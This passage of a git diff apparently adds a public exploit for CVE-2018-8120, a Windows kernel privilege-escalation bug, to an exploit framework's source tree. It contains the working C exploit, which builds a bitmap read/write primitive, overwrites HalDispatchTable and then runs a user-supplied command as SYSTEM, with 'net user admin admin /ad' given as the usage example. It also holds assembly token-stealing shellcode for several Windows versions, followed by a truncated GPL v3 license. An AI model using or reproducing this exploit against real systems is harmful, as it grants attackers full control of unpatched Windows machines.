HalDTOffset); + } +} +void main() +{ + int argc = 0; + wchar_t **argv = CommandLineToArgvW(GetCommandLineW(), &argc); + puts("CVE-2018-8120 exploit by @unamer(https://github.com/unamer)"); + fflush(stdout); + if (argc != 2) + { + puts("Usage: exp.exe command\nExample: exp.exe \"net user admin admin /ad\""); + fflush(stdout); + ExitProcess(0); + } + + HMODULE hntdll = GetModuleHandle(L"ntdll"); + PVOID overwrite_address; + int overwrite_offset; + ULONG Interval = 0; + PVOID sc=0; + + OSVERSIONINFOW osver; + RtlSecureZeroMemory(&osver, sizeof(osver)); + osver.dwOSVersionInfoSize = sizeof(osver); + RtlGetVersionT pRtlGetVersion = (RtlGetVersionT)GetProcAddress(hntdll, "RtlGetVersion"); + pRtlGetVersion(&osver); + if (osver.dwMajorVersion == 5) { +#ifdef _WIN64 + g_EPROCESS_TokenOffset = 0x160; + g_EPROCESS = 0x68; + g_flink = 0xe0; + g_PID = 0xd8; + g_kthread = 0x188; +#else + g_EPROCESS_TokenOffset = 0xd8; + g_EPROCESS = 0x38; + g_flink = 0x098; + g_PID = 0x94; + g_kthread = 0x124; +#endif + } + else if (osver.dwMajorVersion == 6) { +#ifdef _WIN64 + gTableOffset = 0x0f8; + if (osver.dwMinorVersion == 0)//win2008 + { + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x8; // QueryIntervalProfile + sc = &shellcode08; + g_EPROCESS_TokenOffset = 0x168; + g_EPROCESS = 0x68; + g_flink = 0xe0; + g_PID = 0xe8; + g_kthread = 0x188; + } + else + {//win7 + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x8; // QueryIntervalProfile + sc = &shellcode7; + g_EPROCESS_TokenOffset = 0x208; + g_EPROCESS = 0x70; + g_flink = 0x188; + g_PID = 0x180; + g_kthread = 0x188; + } + +#else + gTableOffset = 0x094; + if (osver.dwMinorVersion == 0)//win2008 + { + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x4; // QueryIntervalProfile + gSyscall = 0x121b; + g_EPROCESS_TokenOffset = 0xe0; + g_EPROCESS = 0x48; + g_flink = 0xa0; + g_PID = 0x9c; + g_kthread = 0x124; + } + else + {//win7 + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x4; // QueryIntervalProfile + gSyscall = 0x1226; + g_EPROCESS_TokenOffset = 0xf8; + g_EPROCESS = 0x50; + g_flink = 0xb8; + g_PID = 0xb4; + g_kthread = 0x124; + } +#endif + } + else + { + printf("[-] Not supported version %d\n", osver.dwBuildNumber); + ExitProcess(-1); + } + + + + _NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress((HMODULE)hntdll,"NtAllocateVirtualMemory"); + + PVOID addr = (PVOID)0x100; + DT size = 0x1000; + + + if (!NtAllocateVirtualMemory) { + printf("[-] Fail to resolve NtAllocateVirtualMemory(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(1); + } + + if (NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) + { + puts("[-] Fail to alloc null page!"); + fflush(stdout); + ExitProcess(2); + } + + HWINSTA hSta = CreateWindowStationW(0, 0, READ_CONTROL, 0); + + if (!hSta) + { + printf("[-] CreateWindowStationW fail(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(3); + } + + if (!SetProcessWindowStation(hSta)) + { + printf("[-] SetProcessWindowStation fail(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(4); + } + unsigned int bbuf[0x60] = {0x90}; + //RtlSecureZeroMemory(bbuf, 0x60); + HANDLE gManger = CreateBitmap(0x60, 1, 1, 32, bbuf); + HANDLE gWorker = CreateBitmap(0x60, 1, 1, 32, bbuf); + + PVOID mpv = getpvscan0(gManger); + PVOID wpv = getpvscan0(gWorker); + +#ifndef _WIN64 + printf("[+] Get manager at %lx,worker at %lx\n", mpv, wpv); + P_tagKL pkl = 0; + pkl->hkl = (HKL__ *)wpv; + pkl->piiex = (tagIMEINFOEX *)((char*)mpv - sizeof(PVOID)); + + IMEINFOEX ime; + RtlSecureZeroMemory(&ime, sizeof(IMEINFOEX)); +#else + printf("[+] Get manager at %llx,worker at %llx\n", mpv, wpv); + char* pkl = 0; + *(DT*)(pkl + 0x28) = (DT)wpv; + *(DT*)(pkl + 0x50) = (DT)mpv - sizeof(PVOID); + + char ime[0x200]; + RtlSecureZeroMemory(&ime, 0x200); +#endif // _WIN32 + fflush(stdout); + // Initialize exploit parameters + + PVOID *p = (PVOID *)&ime; + p[0] = (PVOID)wpv; + p[1] = (PVOID)wpv; + DWORD *pp = (DWORD *)&p[2]; + pp[0] = 0x180; + pp[1] = 0xabcd; + pp[2] = 6; + pp[3] = 0x10000; +#ifndef _WIN64 + pp[5] = 0x4800200; +#else + pp[6] = 0x4800200; +#endif // _WIN32 + // trigger vuln + // bp win32k!SetImeInfoEx + // bp win32k!NtUserSetImeInfoEx + // modify the pvscan0 of manager! + + puts("[+] Triggering vulnerability..."); + fflush(stdout); + fflush(stderr); + NtUserSetImeInfoEx((PVOID)&ime); + + PVOID oaddr = ((char*)overwrite_address + overwrite_offset); +#ifndef _WIN64 + sc = &shellcode; + printf("[+] Overwriting...%lx\n", oaddr); +#else + printf("[+] Overwriting...%llx\n", oaddr); +#endif // _WIN32 + fflush(stdout); + + PVOID pOrg = 0; + + SetBitmapBits((HBITMAP)gManger, sizeof(PVOID), &oaddr); + GetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &pOrg); + SetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &sc); + + + NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hntdll, "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) { + fflush(stdout); + fflush(stderr); + printf("[-] Fail to resolve NtQueryIntervalProfile(0x%X)\n", GetLastError()); + ExitProcess(2); + } + puts("[+] Elevating privilege..."); + NtQueryIntervalProfile(0x1337, &Interval); + puts("[+] Cleaning up..."); + SetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &pOrg); + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + fflush(stdout); + fflush(stderr); + ExitProcess(5); + } + wprintf(L"[+] Trying to execute %s as SYSTEM...\n", argv[1]); + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { 0 }; + lstrcpyW(cmd, argv[1]); + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) + { + fflush(stdout); + fflush(stderr); + CloseHandle(hWrite); + CloseHandle(hRead); + wprintf(L"[-] CreateProcessW failed![%p]\n", GetLastError()); + ExitProcess(6); + } + CloseHandle(hWrite); + printf("[+] Process created with pid %d!\n", pi.dwProcessId); + while (1) + { + if (!ReadFile(hRead, buf + br, 4000, &bytesRead, NULL)) + break; + br += bytesRead; + } + // HANDLE h = GetStdHandle(STD_OUTPUT_HANDLE); + // WriteConsoleA(h, buf, br, &bytesRead, 0); + puts((char*)buf); + fflush(stdout); + fflush(stderr); + CloseHandle(hRead); + CloseHandle(pi.hProcess); +} \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm new file mode 100755 index 0000000000..75a1c027d4 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm @@ -0,0 +1,70 @@ + +public shellcode08 +public shellcode7 +public shellcode03 +public NtUserSetImeInfoEx +_TEXT SEGMENT +NtUserSetImeInfoEx PROC + mov r10,rcx; + mov eax,4871; + syscall; + ret; +NtUserSetImeInfoEx ENDP + +shellcode08 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov rdi, 232; + SearchSystemPID: + mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub rax, rdi; + cmp [rax + 224], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 360];// Get SYSTEM process nt!_EPROCESS.Token + mov [rcx + 360], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode08 ENDP + +shellcode7 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 112];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov rdi, 392; + SearchSystemPID: + mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub rax, rdi; + cmp [rax + 384], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 520];// Get SYSTEM process nt!_EPROCESS.Token + mov [rcx + 520], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode7 ENDP + +shellcode03 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// SYSTEM Process PID = 0x4 + mov rdi, 224;// Get nt!_EPROCESS.ActiveProcessLinks.Flink + SearchSystemPID: + mov rax, [rax + rdi]; + sub rax, rdi; + cmp [rax + 216], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 352];// Get SYSTEM process nt!_EPROCESS.Token + mov [rcx + 352], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode03 ENDP + +_TEXT ENDS + +END \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/LICENSE b/external/source/exploits/CVE-2018-8120/LICENSE new file mode 100755 index 0000000000..94a9ed024d --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/LICENSE @@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS 